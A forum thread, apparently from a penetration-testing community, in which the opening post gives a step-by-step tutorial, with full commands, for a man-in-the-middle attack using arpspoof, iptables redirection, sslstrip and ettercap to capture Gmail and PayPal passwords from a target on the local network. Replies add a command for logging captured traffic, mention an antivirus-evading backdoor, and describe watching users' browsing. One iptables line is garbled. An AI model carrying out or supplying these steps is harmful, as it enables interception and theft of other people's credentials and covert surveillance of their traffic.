Page 1 of 8 123 ... LastLast
Results 1 to 10 of 71

Thread: [Video+Tutorial] How to: Crack snifff SSL / HTTPS (sslstrip)

  1. #1

    Arrow [Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
    Download video: http://www.mediafire.com/download.php?ykgjnkyejku
    Commands: http://pastebin.com/fd6eadf7


    What is this?

    This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.


    How does this work?
    > Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
    > Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
    > SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
    > ettercap then picks out the username & password.


    What do I need?

    > sslstrip
    > arpspoof
    > ettercap
    *all in BackTrack 4 Pre Final*


    Network Setup:
    Targets IP: 192.168.1.6
    Gateway : 192.168.1.1


    Software
    Name: sslstrip
    Version: 0.2
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz

    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: ettercap
    Version: 0.7.3
    Home Page: http://ettercap.sourceforge.net
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download


    Commands:
    Code:
    kate /etc/ettercap.conf
    >*uncomment redir_command_off in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
    
    iptables -t A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    ettercap -T -q -i wlan0
    
    sslstrip -a -k -f
    ettercap -T -q -i wlan0


    Notes:

    You could save the packets instead, and then look through it later, in case ettercap doesn't pick up the information you need!
    Video length: 03:55

    Capture length: 4:41
    Song: 16 Bit Lolitas - Nobody Seems To Care

    Blog Post:http://g0tmi1k.blogspot.com/2009/07/videotutorial-how-to-snifff-ssl-https.html
    Forum Post: http://forums.remote-exploit.org/backtrack-4-howto/24426-video-tutorial-how-crack-snifff-ssl-https-sslstrip.html



    ~g0tmi1k
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  2. #2
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    7

    Default

    Very nice tut - keep up the good work

  3. #3
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Nice tut... one small point - the exe for backdoor is getting cought by AV as trojan... grrrrr It can escape from half of the AV in Virustotal but .....
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  4. #4
    Just burned his ISO imported_evanuz's Avatar
    Join Date
    Dec 2008
    Posts
    2

    Default

    How do i save the packets?

  5. #5

    Default

    Nice work, thanks for posting.

    Great tune to roll with, I was sad when it cut out around halfway into the video but was no big deal. Nice Video and thanks again for sharing it for others.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  6. #6

    Default

    Quote Originally Posted by kazalku View Post
    Nice tut... one small point - the exe for backdoor is getting cought by AV as trojan... grrrrr It can escape from half of the AV in Virustotal but .....
    kazalku,
    Thanks! But i'm not using SBD this time around! Plus I dont have any AV running on my targets PC!

    evanuz,
    I use:
    sslstrip -a -k -f --write /root/output-ssl
    You can then do
    kate /root/output-ssl
    OR
    less /root/output-ssl
    OR
    nano /root/output-ssl | grep [username]
    freemymind,
    Thanks for the thanks!
    The music cuts out!? :O *goes and checks*


    Edit:
    Yup - music was missing half way! Re-uploaded (blip.tv and mediafire - links updated!)
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  7. #7
    Just burned his ISO
    Join Date
    Mar 2006
    Posts
    17

    Default

    Great tutorial and tool but i had a few problems. Was able to get everything up and running no problem using the bt4 pre release but the experience for the user on the target pc was not very seamless.

    While testing, I noticed that my target box was taking much longer to load sites (some didnt load at all). Many of the sites would hang with only half the page loaded and in some cases just timeout completely.

    The attack was working and i was seeing my passwords in plaintext but I couldn't get it so that the target machine seemed unchanged. In many attempts I would log into my gmail account, but would never make it to my inbox. It would just hang or take me back to the login screen.

    Anyone else have this problem?

  8. #8
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by hyperlitemofo View Post
    The attack was working and i was seeing my passwords in plaintext but I couldn't get it so that the target machine seemed unchanged. In many attempts I would log into my gmail account, but would never make it to my inbox. It would just hang or take me back to the login screen.
    Some websites check on the client side whether you are in SSL or not, which would be conducive to your issue here. Try proxying with a proper SSL proxy (ettercap has one) - you will get the self signed warning, but will probably succeed in testing your account.

    I use a similar attack when the audit team requests access to particular information about a users browsing habits, it's good to be able to watch their ssl proxy usage sometimes.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  9. #9
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    When SSLstrip 0.2 came out I got a copy form Moxie and wrote a tut here. Even put it on a rouge AP. Props to "DarkOperator" for that script. It was so slow we talked about porting it to C. This was not on pre though. Just BT4 beta. Is SSLstrip (not on a rouge AP) still ULTRA slow?

    Onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  10. #10
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    Ya i did a write up of running it under airbase .. its not really a prob with sslstrip but more a airbase limitation as you cant set the mtu size on the alfa card. Other cards should work however
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

Page 1 of 8 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •